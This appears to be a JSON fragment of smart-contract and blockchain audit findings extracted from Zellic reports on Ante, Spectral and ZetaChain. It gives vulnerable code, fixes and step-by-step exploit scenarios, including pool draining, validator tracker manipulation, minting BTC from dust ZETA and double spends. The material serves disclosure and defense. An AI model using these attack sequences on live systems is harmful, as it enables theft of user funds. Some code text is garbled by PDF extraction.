8e4db312c7046db3f76146080f166baeab025acb.", + "html_url": "https://github.com/Zellic/publications/blob/master/Ante - Zellic Audit Report.pdf" + }, + { + "title": "3.4 Reentrant checkTest allows pool draining", + "labels": [ + "Zellic" + ], + "body": " Target: AntePool Category: Coding Mistakes Likelihood: Low Severity: Medium Impact: Critical Because checkTest allows reentrancy, in specific cases, an attacker may be able to drain an AntePool by 1. Calling checkTest on a test that returns false (not one that reverts). The test must be written in a way that causes the contract to make an external call to an attacker contract. The attacker contract repeats step 1 as many times as desired. 2. After entering the if condition, the _verifier is changed to the current caller. 3. The current caller calls claim after checkTest returns. Steps 2\u20133 repeat for each reentrant call to checkTest, causing the 5% bounty to be claimed multiple times. For this to be exploitable, a test must: be able to return false without reverting; not have a checkTestPasses function that is view or pure; and call a function on the tested contract that internally makes an external call (e.g., to fallback or receive) to an attacker-controlled contract, for whatever reason. If a test fails on a contract matching certain requirements, an attacker could drain the majority of the pool by repeatedly changing the verifier and claiming bounties. We recommend using the nonReentrant modifier or otherwise preventing the checkTest function from allowing reentrancy. Ante Labs acknowledged this finding and implemented a fix in commit 8448a63d3c7f7303e35cfc63807cdad540d3aa85. 
", + "html_url": "https://github.com/Zellic/publications/blob/master/Ante - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Potential integer underflow in calculateAllocation", + "labels": [ + "Zellic" + ], + "body": " Target: SpecToken Category: Coding Mistakes Likelihood: N/A Severity: Informational Impact: Informational The addToWhitelist function allows the owner to update the allocation amount at any time during the whitelistAddEnd period. The totalAllocation variable is calculated as follows: uint256 totalAllocation = currentMonth * allocations[_account].monthlyAllocation + allocations[_account].initialAllocation; If the value of totalAllocation is less than the totalSpent[_account] total amount (i.e., the amount of token that has been transferred out, other than that transferred to the veTokenMigrator address), the following calculation will underflow, causing a reversion: return totalAllocation - totalSpent[_account]; This may happen if the owner calls addToWhitelist and decreases the initialAllocation or monthlyAllocation amounts. The calculateAllocation function provides less configurability than likely intended, as the owner cannot always decrease the allocation configuration. Regardless, we recommend preventing underflows to improve correctness (enabling formal verification in the future) and make errors more easily debuggable. Use the maximum value between 0 and totalAllocation - totalSpent[_account]: function calculateAllocation(address _account) public view returns (uint256) { uint256 currentMonth = calculateCurrentMonth(); if (currentMonth < 12) { return 0; // 12-month cliff } uint256 totalAllocation = currentMonth * allocations[_account].monthlyAllocation + allocations[_account].initialAllocation; if (totalAllocation < totalSpent[_account]) return 0; return totalAllocation - totalSpent[_account]; } This issue has been acknowledged by Spectral Finance, and a fix was implemented in commit d39c89a3.", + "html_url": "https://github.com/Zellic/publications/blob/master/Spectral Token - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Any ZetaSent events are processed regardless of what contract emits them", + "labels": [ + "Zellic" + ], + "body": " Target: evm_hooks.go Category: Coding Mistakes Likelihood: High Severity: Critical Impact: Critical The main method through which funds are intended to be bridged over from the zEVM to another chain is by calling the send() function in the zEVM\u2019s ZetaConnectorZEVM contract. This function emits a ZetaSent event, which is intended to be processed by the crosschain module\u2019s PostTxProcessing() hook. It is crucial that this function checks to ensure that any ZetaSent event it picks up originated from the ZetaConnectorZEVM contract. Otherwise, any malicious attacker can deploy their own contract on the zEVM and emit arbitrary ZetaSent events to send arbitrary amounts of ZETA without actually holding any ZETA. Inside the PostTxProcessing() hook, we see the following: func (k Keeper) PostTxProcessing( ctx sdk.Context, msg core.Message, receipt *ethtypes.Receipt, ) error { target := receipt.ContractAddress if msg.To() != nil { target = *msg.To() } for _, log := range receipt.Logs { eZRC20, err := ParseZRC20WithdrawalEvent(*log) if err == nil { if err := k.ProcessZRC20WithdrawalEvent(ctx, eZRC20, target, \"\"); err != 
nil { return err } } eZeta, err := ParseZetaSentEvent(*log) if err == nil { if err := k.ProcessZetaSentEvent(ctx, eZeta, target, \"\"); err != nil { return err } } } return nil } The receipt parameter of this function contains information about transactions that occur on the zEVM. This function iterates through all logs (i.e., emitted events) in each receipt and attempts to parse the events as Withdrawal or ZetaSent events. However, there is no check to ensure that these events originate from the ZetaConnectorZEVM contract. This allows a malicious attacker to deploy their own contract on the zEVM, which would allow them to emit arbitrary ZetaSent events, and thus gain access to ZETA tokens that they otherwise should not have access to. The prototype of the ZetaSent event is as follows: event ZetaSent( address sourceTxOriginAddress, address indexed zetaTxSenderAddress, uint256 indexed destinationChainId, bytes destinationAddress, uint256 zetaValueAndGas, uint256 destinationGasLimit, bytes message, bytes zetaParams ); It is important to note that Withdrawal events are not affected by this bug. The ProcessZRC20WithdrawalEvent() function checks and ensures that the event was emitted from a whitelisted ZRC20 token contract address. Add a check to ensure that ZetaSent events are only processed if they are emitted from the ZetaConnectorZEVM contract. This issue has been acknowledged by ZetaChain, and a fix was implemented in commit 8a988ae9.", + "html_url": "https://github.com/Zellic/publications/blob/master/ZetaChain - 6.30.23 Zellic Audit Report.pdf" + }, + { + "title": "3.2 Bonded validators can trigger reverts for successful transactions", + "labels": [ + "Zellic" + ], + "body": " Target: keeper_out_tx_tracker.go Category: Coding Mistakes Likelihood: High Severity: Critical Impact: Critical A single bonded validator has the ability to add or remove transactions from the out tracker, as the only check is that they are bonded. func (k msgServer) AddToOutTxTracker(goCtx context.Context, msg *types.MsgAddToOutTxTracker) (*types.MsgAddToOutTxTrackerResponse, error) { ctx := sdk.UnwrapSDKContext(goCtx) // Zellic: this is the only relevant check validators := k.StakingKeeper.GetAllValidators(ctx) if !IsBondedValidator(msg.Creator, validators) && msg.Creator != types.AdminKey { return nil, sdkerrors.Wrap(sdkerrors.ErrorInvalidSigner, fmt.Sprintf(\"signer %s is not a bonded validator\", msg.Creator)) } // [ ... ] } func (k msgServer) RemoveFromOutTxTracker(goCtx context.Context, msg *types.MsgRemoveFromOutTxTracker) (*types.MsgRemoveFromOutTxTrackerResponse, error) { ctx := sdk.UnwrapSDKContext(goCtx) validators := k.StakingKeeper.GetAllValidators(ctx) if !IsBondedValidator(msg.Creator, validators) && msg.Creator != types.AdminKey { return nil, sdkerrors.Wrap(sdkerrors.ErrorInvalidSigner, fmt.Sprintf(\"signer %s is not a bonded validator\", msg.Creator)) } k.RemoveOutTxTracker(ctx, msg.ChainId, msg.Nonce) return &types.MsgRemoveFromOutTxTrackerResponse{}, nil } This allows a malicious validator to remove an entry from the out transaction tracker and replace it with another one. One way to exploit this would be to 1. Initiate a Goerli->Goerli message sending some ZETA by calling ZetaConnectorEth.send on the Goerli chain. 2. After processing the incoming events, a new transaction will be signed, sending the ZETA back to the Goerli chain in signer.TryProcessOutTx, and then added to the outgoing transaction tracker. 3. 
The malicious validator can then remove that transaction using tx crosschain remove-from-out-tx-tracker 1337 nonce and add a different transaction that has previously failed (any failed hash will do) using the original nonce. 4. Then, observeOutTx will pick up this fake transaction from the tracker and add it to ob.outTXConfirmedReceipts and ob.outTXConfirmedTransaction. 5. Next, IsSendOutTxProcessed is run using this fake receipt and PostReceiveConfirmation is called, marking that status as ReceiveStatus_Failed. 6. The flow then continues on to revert the cross-chain transactions (CCTXs) and return the ZETA even though the original transaction went through, causing more ZETA to be transferred than was originally sent. Here is what the attacker’s ZETA balance would look like when performing the above attack: 900000000000000000000 // initial balance 890000000000000000000 // balance after triggering ZetaConnectorEth.send 897999999999799398194 // balance after receiving funds from the deleted out tracker tx 903999999999398194581 // balance after receiving the revert funds Zellic ZetaChain Consider whether a single validator should be able to remove transactions from the out tracker or whether it could be done via a vote. If it is unnecessary, then the feature should be removed. The observeOutTx method could be hardened to ensure that the sender of the transaction is the correct threshold signature scheme (TSS) address and that the nonce of the transaction matches the expected value. This does not prevent a malicious validator from removing legitimate transactions from the tracker and locking up funds. This issue has been acknowledged by ZetaChain, and a fix was implemented in commits 24d4f9eb and 8222734c. Zellic ZetaChain", "html_url": "https://github.com/Zellic/publications/blob/master/ZetaChain - 6.30.23 Zellic Audit Report.pdf" }, { "title": "3.3 Sending ZETA to a Bitcoin network results in BTC being sent instead", "labels": [ "Zellic" ], "body": "Target: btc_signer.go Category: Coding Mistakes Likelihood: High Severity: Critical : Critical There are three different types of coin that can be sent via outgoing transactions, which are CoinType_Zeta, CoinType_Gas, and CoinType_ERC20. The observer will call go signer.TryProcessOutTx(send, outTxMan, outTxID, chainClient, co.bridge) on each of the current out transactions, and it is up to the signer implementation for each chain to handle the different coin types. The EVMSigner correctly handles all the coin types, but the BTCSigner assumes that all the transactions are of type CoinType_Gas. func (signer *BTCSigner) TryProcessOutTx(send *types.CrossChainTx, outTxMan *OutTxProcessorManager, outTxID string, chainclient ChainClient, zetaBridge *ZetaCoreBridge) { // [ ... ] // Zellic: - incorrect assumption of CoinType_Gas here included, confirmed, _ := btcClient.IsSendOutTxProcessed(send.Index, int(send.GetCurrentOutTxParam().OutboundTxTssNonce), common.CoinType_Gas) if included || confirmed { logger.Info().Msgf(\"CCTX already processed; exit signer\") return } // [ ... ] If you try to send ZETA to a Bitcoin chain using ZetaConnectorZEVM.send on the zEVM, it will generate an outgoing CCTX with a coin type of CoinType_Zeta and an Amount of the ZETA that was burnt. This will then get picked up by the BTCSigner and processed as if it was a CoinType_Gas, which directly sends Amount / 1e8 (the BTC gas coin has decimals of 8 in zEVM) of BTC to the receiver.
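To make the missing check concrete, the following is a minimal, self-contained Go sketch of the coin-type guard the Bitcoin signer needs before paying anything out; the struct, constants, and function here are illustrative stand-ins, not ZetaChain's actual types:

```go
package main

import "fmt"

// Illustrative coin types, mirroring the three kinds described above.
type CoinType int

const (
	CoinTypeZeta CoinType = iota
	CoinTypeGas
	CoinTypeERC20
)

// Illustrative stand-in for the CCTX fields that matter here.
type CrossChainTx struct {
	CoinType CoinType
	Amount   uint64 // only meaningful as satoshis when CoinType is CoinTypeGas
}

// signBTCOutTx refuses anything that is not the gas coin, instead of
// interpreting every Amount as satoshis.
func signBTCOutTx(tx CrossChainTx) error {
	if tx.CoinType != CoinTypeGas {
		return fmt.Errorf("btc signer: unsupported coin type %d; refusing to pay out %d sats", tx.CoinType, tx.Amount)
	}
	// ... build, sign, and broadcast the BTC transaction ...
	return nil
}

func main() {
	// A ZETA-typed CCTX must be rejected rather than paid out in BTC.
	err := signBTCOutTx(CrossChainTx{CoinType: CoinTypeZeta, Amount: 100_000_000})
	fmt.Println(err)
}
```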
Zellic ZetaChain This allows someone to burn a tiny fraction of a ZETA (1/1e10) and receive one BTC in return. The BTCSigner should reject any transactions that are not of type CoinType_Gas. The EvmHooks could check to ensure that the destination chain supports CoinType_Zeta and could reject any transactions before they reach the inbound tracker. This issue has been acknowledged by ZetaChain, and a fix was implemented in com- mit 630c515f. Zellic ZetaChain", + "html_url": "https://github.com/Zellic/publications/blob/master/ZetaChain - 6.30.23 Zellic Audit Report.pdf" + }, + { + "title": "3.4 Race condition in Bitcoin client leads to double spend", + "labels": [ + "Zellic" + ], + "body": "Target: btc_signer.go Category: Coding Mistakes Likelihood: High Severity: Critical : Critical The Bitcoin client is used to watch for cross-chain transactions as well as to relay transactions to and from the Bitcoin chain. There are numerous functions in the client, but the relevant functions are described below: 1. IsSendOutTxProcessed() - Checks the ob.submittedTx[outTxID] to see whether the transaction in question has already been submitted for relaying. 2. startSendScheduler() - Runs every three seconds. This function gets all pending CCTX and checks if they have already been submitted with IsSendOutTxProces sed(). If the CCTX has not been submitted, it will call TryProcessOutTx(). 3. TryProcessOutTx() - Signs and broadcasts a CCTX, then adds it to a tracker in the x/crosschain module with AddTxHashToOutTxTracker(). 4. observeOutTx() - Runs every two seconds. It queries for all transactions that have been added to the tracker in the x/crosschain module and adds them to ob.submittedTx[outTxID]. The bug here occurs due to the racy check in IsSendOutTxProcessed(). More specifi- cally, the following scenario would lead to the bug: 1. First, startSendScheduler() runs and gets a pending CCTX. It checks that the CCTX has not been processed (i.e., has not been added to ob.submittedTx[], so IsSendOutTxProcessed() returns false), and thus calls TryProcessOutTx(). 2. Then, TryProcessOutTx() signs the CCTX and broadcasts it, then adds it to the tracker in the x/crosschain module. 3. After, startSendScheduler() runs again before observeOutTx() is able to run. The CCTX is in the x/crosschain module tracker but not yet in ob.submittedTx[] since observeOutTx() has not run yet. Therefore, TryProcessOutTx() is called again. Zellic ZetaChain 4. Then TryProcessOutTx() runs, signs, broadcasts, and adds the same CCTX to the tracker in the x/crosschain module. 5. Finally, observeOutTx() runs and adds (or in this case, overwrites) the CCTX to ob.submittedTx[]. The bug occurs in step 3. Since observeOutTx() is responsible for adding the CCTX to the ob.submittedTx[] map, the intention is for observeOutTx() to run before startSe ndScheduler() runs again. Due to the racy nature of the code though, this does not happen, and thus the bug is triggered. The bug triggers with the current smoke tests by modifying the following line of code in bitcoin_client.go to make observeOutTx() run every 30 seconds. func (ob *BitcoinChainClient) observeOutTx() { ticker :) time.NewTicker(30 * time.Second) /) [ ...)) ] } A naive fix for this bug is to modify IsSendOutTxProcessed() to make it query for pend- ing CCTXs in the x/crosschain module\u2019s tracker instead. This will prevent this issue from occurring, as startSendScheduler() and TryProcessOutTx() run synchronously. 
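The broader synchronization recommended below reduces to one invariant: the "already submitted?" check and the "mark as submitted" write must happen atomically. A minimal, self-contained Go sketch of that pattern (all names are illustrative, not ZetaChain's actual API):

```go
package main

import (
	"fmt"
	"sync"
)

// outTxTracker performs the check and the write under one lock, so two
// scheduler ticks can never both decide to sign the same CCTX.
type outTxTracker struct {
	mu        sync.Mutex
	submitted map[string]bool
}

// tryClaim returns true exactly once per outTxID.
func (t *outTxTracker) tryClaim(outTxID string) bool {
	t.mu.Lock()
	defer t.mu.Unlock()
	if t.submitted[outTxID] {
		return false
	}
	t.submitted[outTxID] = true
	return true
}

func main() {
	tracker := &outTxTracker{submitted: map[string]bool{}}
	signed := make(chan string, 2)
	var wg sync.WaitGroup
	// Two concurrent scheduler ticks race to process the same CCTX.
	for i := 0; i < 2; i++ {
		wg.Add(1)
		go func() {
			defer wg.Done()
			if tracker.tryClaim("cctx-1") {
				signed <- "signing cctx-1"
			}
		}()
	}
	wg.Wait()
	close(signed)
	for msg := range signed {
		fmt.Println(msg) // printed exactly once, not twice
	}
}
```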
Although the above fix is sufficient for this specific issue, we find it important to note that the code here is multithreaded and accesses ob.submittedTx[] asynchronously without any locking involved. Additionally, ob.submittedTx[] is often out of sync with the tracker in the x/crosschain module. Code like this is prone to similar bugs, and it is especially prone to bugs being introduced in the future. Because of this, it is our recommendation that the ZetaChain team do a thorough refactoring of the code to in- troduce synchronization between the functions. This would eliminate the racy nature of the code and make it less likely for bugs to be introduced in the future. This issue has been acknowledged by ZetaChain. Zellic ZetaChain", + "html_url": "https://github.com/Zellic/publications/blob/master/ZetaChain - 6.30.23 Zellic Audit Report.pdf" + }, + { + "title": "3.5 Not waiting for minimum number of block confirmations re- sults in double spend", + "labels": [ + "Zellic" + ], + "body": "Target: btc_client.go Category: Coding Mistakes Likelihood: Medium Severity: Critical : Critical Forks of length 1 (that is, a reorganization of one block in the blockchain) happen semifrequently in the Bitcoin chain. This occurs when two miners mine a winning nonce at nearly the same time. When this occurs, each full node will consider the first block it sees (from either miner) to be the best block for that block height. This would mean that for a short period of time, nodes will be divided on which block should be part of the canonical chain. Some nodes will continue with block A, while the others will continue with block B. The way the nodes come to consensus on which chaintip to follow is by waiting to see which chaintip pulls ahead of the other by adding another block. When this occurs, all nodes that are not on this chaintip will reorganize to the longest chaintip. Note that forks of length greater than 1 can also occur, but the probability of it occurring goes down as the length goes up. In Satoshi\u2019s Bitcoin whitepaper, it is recommended that applications wait for six block confirmations after a transaction before considering it to be part of the canonical chain (i.e., confirmed and irreversible). This assumes that a malicious attacker who is attempting to construct a malicious chaintip has access to ~10% of the total hashing power of all nodes on the chain. In the Bitcoin client, there is a state variable for the amount of block confirmations that the code must wait before considering a transaction as confirmed. type BitcoinChainClient struct { /) [ ...)) ] confCount int64 /) must wait this many blocks to be considered \"confirmed\" /) [ ...)) ] } However, this variable is not used anywhere in the code. The client assumes that Zellic ZetaChain any transaction it sees in new blocks are confirmed, and it will create and broadcast CCTXs immediately. This causes an issue, because if the Bitcoin chain reorganizes at any point in time after the CCTX has been created, the Bitcoin transaction will revert, but funds will have already been sent across to the zEVM. To demonstrate this in the local testing environment, we used the invalidateblock RPC call. The steps for the attack are as follows: 1. Send 1 BTC from the smoketest wallet to the Bitcoin TSS address bcrt1q7cj32g6 scwdaa5sq08t7dqn7jf7ny9lrqhgrwz. 2. Mine a block using the generatetoaddress RPC. 3. Confirm that the transaction was included, either by checking the client logs for the CCTX or using a block explorer such as btc-rpc-explorer. 4. 
Use the invalidateblock RPC to invalidate the block that the transaction oc- curred in. The above steps will result in a CCTX being generated for 1 BTC to be sent to the zEVM. However, due to the reorganization triggered in step 4, the 1 BTC that was sent in step 1 will remain in the smoketest wallet. Therefore, 1 BTC will essentially have been minted in the zEVM. The Bitcoin client should wait for a minimum number of block confirmations before assuming that a block has been confirmed. The recommended number is six block confirmations according to the Bitcoin whitepaper. This issue has been acknowledged by ZetaChain, and a fix was implemented in com- mit c276e903. Zellic ZetaChain", + "html_url": "https://github.com/Zellic/publications/blob/master/ZetaChain - 6.30.23 Zellic Audit Report.pdf" + }, + { + "title": "3.6 Multiple events in the same transaction causes loss of funds and chain halting", + "labels": [ + "Zellic" + ], + "body": "Target: evm_hooks.go Category: Coding Mistakes Likelihood: High Severity: Critical : Critical The ProcessZetaSentEvent() and ProcessZRC20WithdrawalEvent() functions are used to process ZetaSent and Withdrawal events respectively. These events are emitted by the ZetaConnectorZEVM contract. These functions first use the parameters of the emitted event to create a new MsgSen dVoter message. It then hashes this message and uses the hash as an index to create a new CCTX. The relevant code in ProcessZetaSentEvent() is shown below: func (k Keeper) PostTxProcessing(/) ...)) *)) error { /) [ ...)) ] for _, log :) range receipt.Logs { /) [ ...)) ] eZeta, err :) ParseZetaSentEvent(*log) if err =) nil { if err :) k.ProcessZetaSentEvent(ctx, eZeta, target, \"\"); err return err !) nil { } } } return nil } func (k Keeper) ProcessZetaSentEvent(ctx sdk.Context, event *contracts.ZetaConnectorZEVMZetaSent, contract ethcommon.Address, txOrigin string) error { /) [ ...)) ] msg :) zetacoretypes.NewMsgSendVoter(\"\", contract.Hex(), Zellic ZetaChain senderChain.ChainId, txOrigin, toAddr, receiverChain.ChainId, amount, \"\", event.Raw.TxHash.String(), event.Raw.BlockNumber, 90000, common.CoinType_Zeta, \"\") sendHash :) msg.Digest() cctx :) k.CreateNewCCTX(ctx, msg, sendHash, zetacoretypes.CctxStatus_PendingOutbound, &senderChain, receiverChain) EmitZetaWithdrawCreated(ctx, cctx) return k.ProcessCCTX(ctx, cctx, receiverChain) } An issue arises if two or more events are emitted in the same transaction with the same parameters. To demonstrate this, let us assume that two identical ZetaSent events are emitted in the same transaction. If the parameters are the same, then the sendHash that is generated from hashing the MsgSendVoter message will be identical for both the events. When this happens, the CCTX that is created will be the same for both events, and thus the CCTX created for the second ZetaSent event will overwrite the CCTX created for the first ZetaSent event. An example of a scenario in which this might occur is when a user wants to send 10,000 ZETA tokens to their own address on a different chain. One way they might do this is by opting to send 5,000 ZETA in two ZetaSent events. Since all other pa- rameters would be the same, only the second ZetaSent event gets processed (the CCTX overwrites the first one). This causes the user to only receive 5,000 ZETA on the receiving chain, even though they originally sent 10,000 ZETA. Additionally, the ProcessCCTX() function will increment the nonce twice in the above scenario. 
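The collision is easy to see in isolation: because the CCTX index is just a hash of the event parameters, two identical events map to one index. A self-contained Go sketch (with a simplified field set; the real digest covers more fields) showing how a per-event nonce, as the report's recommendation introduces, restores uniqueness:

```go
package main

import (
	"crypto/sha256"
	"encoding/binary"
	"fmt"
)

// digest models the CCTX index: a hash over the event parameters. The nonce
// parameter stands in for the contract-side counter proposed as the fix.
func digest(sender, receiver string, amount, nonce uint64) [32]byte {
	var buf []byte
	buf = binary.BigEndian.AppendUint64(buf, sender)
	buf = binary.BigEndian.AppendUint64(buf, receiver)
	buf = binary.BigEndian.AppendUint64(buf, amount)
	buf = binary.BigEndian.AppendUint64(buf, nonce)
	return sha256.Sum256(buf)
}

func main() {
	// Without a per-event nonce (both events effectively use 0), two
	// identical 5,000 ZETA sends collide on one index, so the second CCTX
	// silently overwrites the first.
	a := digest(1, 2, 5000, 0)
	b := digest(1, 2, 5000, 0)
	fmt.Println("same index:", a == b) // true

	// With a nonce that increments per emitted event, every digest (and
	// therefore every CCTX) is distinct.
	c := digest(1, 2, 5000, 1)
	fmt.Println("same index:", a == c) // false
}
```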
Ethereum enforces that nonces have to always increase by one after each transaction, so in the event that this issue occurs, all outgoing transactions to the re- ceiving chain will begin to fail, halting the bridge in the process. func (k Keeper) ProcessCCTX(ctx sdk.Context, cctx zetacoretypes.CrossChainTx, receiverChain *common.Chain) error { /) [ ...)) ] err :) k.UpdateNonce(ctx, receiverChain.ChainId, &cctx) if err !) nil { return fmt.Errorf(\"ProcessWithdrawalEvent: update nonce failed: %s\", err.Error()) } Zellic ZetaChain /) [ ...)) ] } func (k Keeper) UpdateNonce(ctx sdk.Context, receiveChainID int64, cctx *types.CrossChainTx) error { chain :) k.zetaObserverKeeper.GetParams(ctx).GetChainFromChainID(receiveChainID) nonce, found :) k.GetChainNonces(ctx, chain.ChainName.String()) if !found { return sdkerrors.Wrap(types.ErrCannotFindReceiverNonce, fmt.Sprintf(\"Chain(%s) | Identifiers : %s \", chain.ChainName.String(), cctx.LogIdentifierForCCTX())) } /) SET nonce cctx.GetCurrentOutTxParam().OutboundTxTssNonce = nonce.Nonce nonce.Nonce+) k.SetChainNonces(ctx, nonce) return nil } We recommend introducing an ever-increasing nonce within the ZetaConnectorZEVM smart contract. Whenever a new event is emitted by the smart contract, this nonce should be incremented. This means that every emitted event is distinct from all other emitted events, and thus each emitted event will cause the creation of a new CCTX, preventing this issue from occurring. This issue has been acknowledged by ZetaChain, and a fix was implemented in com- mit 2fdec9ef. Zellic ZetaChain", + "html_url": "https://github.com/Zellic/publications/blob/master/ZetaChain - 6.30.23 Zellic Audit Report.pdf" + }, + { + "title": "3.7 Missing authentication when adding node keys", + "labels": [ + "Zellic" + ], + "body": "Target: keeper_node_account.go Category: Coding Mistakes Likelihood: High Severity: Critical : Critical The SetNodeKeys message allows a node to supply a public key that will be used for the TSS signing: func (k msgServer) SetNodeKeys(goCtx context.Context, msg *types.MsgSetNodeKeys) (*types.MsgSetNodeKeysResponse, error) { ctx :) sdk.UnwrapSDKContext(goCtx) addr, err :) sdk.AccAddressFromBech32(msg.Creator) if err !) nil { return nil, sdkerrors.Wrap(sdkerrors.ErrInvalidRequest, fmt.Sprintf(\"msg creator %s not valid\", msg.Creator)) } _, found :) k.GetNodeAccount(ctx, msg.Creator) if !found { na :) types.NodeAccount{ Creator: msg.Creator, Index: msg.Creator, NodeAddress: addr, PubkeySet: msg.PubkeySet, NodeStatus: types.NodeStatus_Unknown, } k.SetNodeAccount(ctx, na) } else { return nil, sdkerrors.Wrap(sdkerrors.ErrInvalidRequest, fmt.Sprintf(\"msg creator %s already has a node account\", msg.Creator)) } return &types.MsgSetNodeKeysResponse{}, nil } The issue is that there are no authentication or verification checks in place to limit who can call it. As a result, anyone can call the function and add their public key to the list. Zellic ZetaChain The list of node accounts is fetched in the InitializeGenesisKeygen and in the zeta client\u2019s genNewKeysAtBlock in order to determine the public keys that should be used for the TSS signing. If anyone is able to add their public key before the list is queried (for example, just before the block number that the new keys will be generated), they could potentially be able to control enough signatures to pass the threshold and sign transactions or otherwise create a denial of service where the TSS can no longer sign anything. 
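The fix the report goes on to recommend amounts to gating the handler on an allow list. A minimal, self-contained Go sketch of that shape (the keeper layout and bech32 strings are illustrative, not ZetaChain's actual API):

```go
package main

import (
	"errors"
	"fmt"
)

// nodeKeeper sketches privileged registration: only addresses on a
// governance-managed allow list may register TSS signing keys.
type nodeKeeper struct {
	authorized map[string]bool   // allow list of trusted operators
	accounts   map[string]string // creator address -> registered pubkey
}

func (k *nodeKeeper) setNodeKeys(creator, pubkey string) error {
	if !k.authorized[creator] {
		return errors.New("creator is not authorized to set node keys")
	}
	if _, exists := k.accounts[creator]; exists {
		return errors.New("creator already has a node account")
	}
	k.accounts[creator] = pubkey
	return nil
}

func main() {
	k := &nodeKeeper{
		authorized: map[string]bool{"zeta1trustedoperator": true},
		accounts:   map[string]string{},
	}
	fmt.Println(k.setNodeKeys("zeta1trustedoperator", "pubkey-a")) // <nil>
	fmt.Println(k.setNodeKeys("zeta1attacker", "pubkey-b"))        // rejected
}
```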
Adding node accounts should be a privileged operation, and only trusted keys should be able to be added. This issue has been acknowledged by ZetaChain, and a fix was implemented in com- mit a246e64b. Zellic ZetaChain", + "html_url": "https://github.com/Zellic/publications/blob/master/ZetaChain - 6.30.23 Zellic Audit Report.pdf" + }, + { + "title": "3.8 Missing nil check when parsing client event", + "labels": [ + "Zellic" + ], + "body": "Target: evm_client.go Category: Coding Mistakes Likelihood: High Severity: High : High One of the responsibilities of the zeta client is to watch for incoming transactions and handle any ZetaSent events emitted by the connector. logs, err :) ob.Connector.FilterZetaSent(&bind.FilterOpts{ Start: uint64(startBlock), End: &tb, Context: context.TODO(), }, []ethcommon.Address{}, []*big.Int{}) if err !) nil { return err } cnt, err :) ob.GetPromCounter(\"rpc_getLogs_count\") if err !) nil { return err } cnt.Inc() /) Pull out arguments from logs for logs.Next() { event :) logs.Event ob.logger.Info().Msgf(\"TxBlockNumber %d Transaction Hash: %s Message : %s\", event.Raw.BlockNumber, event.Raw.TxHash, event.Message) destChain :) common.GetChainFromChainID(event.DestinationChainId.Int64()) destAddr :) clienttypes.BytesToEthHex(event.DestinationAddress) if strings.EqualFold(destAddr, con- fig.ChainConfigs[destChain.ChainName.String()].ZETATokenContractAddress) { ob.logger.Warn().Msgf(\"potential attack attempt: %s destination address is ZETA token contract address %s\", destChain, destAddr)} Zellic ZetaChain When fetching the destination chain, common.GetChainFromChainID(event.Destinatio nChainId.Int64()) is used, which will return nil if the chain is not found. func GetChainFromChainID(chainID int64) *Chain { chains :) DefaultChainsList() for _, chain :) range chains { if chainID =) chain.ChainId { return chain } } return nil } Since a user is able to specify any value for the destination chain, if a nonsupported chain is used, then destChain will be nil and the following destChain.ChainName call will cause the client to crash. As all the clients watching the remote chain will see the same events, a malicious user (or a simple mistake entering the chain) will cause all the clients to crash. If the clients automatically restart and try to pick up from the block they were up to (the default), then they will crash again and enter into an endless restart and crash loop. This will prevent any incoming or outgoing transactions on the remote chain from being processed, effectively halting that chain\u2019s integration. There should be an explicit check to ensure that destChain is not nil and to skip the log if it is. It would also be a good idea to have a recovery mechanism that can handle any blocks that cause the client to crash and skip them. This will help prevent the remote chain from being paused if a similar bug occurs again. This issue has been acknowledged by ZetaChain, and a fix was implemented in com- mit 0dfbf8d7. Zellic ZetaChain", + "html_url": "https://github.com/Zellic/publications/blob/master/ZetaChain - 6.30.23 Zellic Audit Report.pdf" + }, + { + "title": "3.9 Case-sensitive address check allows for double signing", + "labels": [ + "Zellic" + ], + "body": "Target: keeper_chain_nonces.go Category: Coding Mistakes Likelihood: Low Severity: High : High The IsDuplicateSigner() function is used to check whether a given address already exists within a list of signers. It does this by doing a string comparison, which is case sensitive. 
func isDuplicateSigner(creator string, signers []string) bool { for _, v :) range signers { if creator =) v { return true } } return false } This function is used in CreateTSSVoter(), which is the message handler for the MsgCr eateTSSVoter message. This message is used by validators to vote on a new TSS. func (k msgServer) CreateTSSVoter(goCtx context.Context, msg *types.MsgCreateTSSVoter) (*types.MsgCreateTSSVoterResponse, error) { /) [ ...)) ] if isDuplicateSigner(msg.Creator, tssVoter.Signers) { return nil, sdkerrors.Wrap(sdkerrors.ErrorInvalidSigner, fmt.Sprintf(\"signer %s double signing!)\", msg.Creator)) } /) [ ...)) ] /) this needs full consensus on all validators. if len(tssVoter.Signers) =) len(validators) { tss :) types.TSS{ Creator: \"\", Index: tssVoter.Chain, Zellic ZetaChain Chain: tssVoter.Chain, Address: tssVoter.Address, Pubkey: tssVoter.Pubkey, Signer: tssVoter.Signers, FinalizedZetaHeight: uint64(ctx.BlockHeader().Height), } k.SetTSS(ctx, tss) } return &types.MsgCreateTSSVoterResponse{}, nil } In Cosmos-based chains, addresses are alphanumeric, and the alphabetical charac- ters in the address can either be all uppercase or all lowercase when represented as a string. This means that case-sensitive string comparisons, such as the one in IsDup licateSigner(), can allow a single creator to pass the check twice \u2014 once for an all lowercase address, and once for an all uppercase version of the same address. Due to the len(tssVoter.Signers) =) len(validators) check, it is possible for a ma- licious actor to spin up multiple bonded validators and double sign with each of them. This would cause the check to erroneously pass, even though full consensus has not been reached, and allow the malicious actor to effectively force the vote to pass. The sdk.AccAddressFromBech32() function can be used to convert a string address to an instance of a sdk.AccAddress type. Comparing two sdk.AccAddress types is the correct way to compare addresses in Cosmos-based chains, and it will fix this issue. This issue has been acknowledged by ZetaChain, and a fix was implemented in com- mit 83d0106b. Zellic ZetaChain", + "html_url": "https://github.com/Zellic/publications/blob/master/ZetaChain - 6.30.23 Zellic Audit Report.pdf" + }, + { + "title": "3.10 No panic handler in Zetaclient may halt cross-chain com- munication", + "labels": [ + "Zellic" + ], + "body": "Target: btc_signer.go Category: Coding Mistakes Likelihood: Medium Severity: High : High The code under zetaclient/ implements two separate clients \u2014 an EVM client for all EVM-compatible chains and a Bitcoin client for the Bitcoin chain. The clients are intended to relay transactions between chains as well as watch for cross-chain inter- actions (via emitted events). In the event that a panic occurs in the zetaclient code, the client will simply crash. If a malicious actor is able to find a reliable way to cause panics, they can effectively halt all cross-chain communications by crashing all of the clients for that specific chain. We discovered a bug in the Bitcoin client that can allow a malicious actor to achieve this; however, there may be numerous other ways to do this. The bug exists in the Bitcoin client\u2019s TryProcessOutTx() function. 
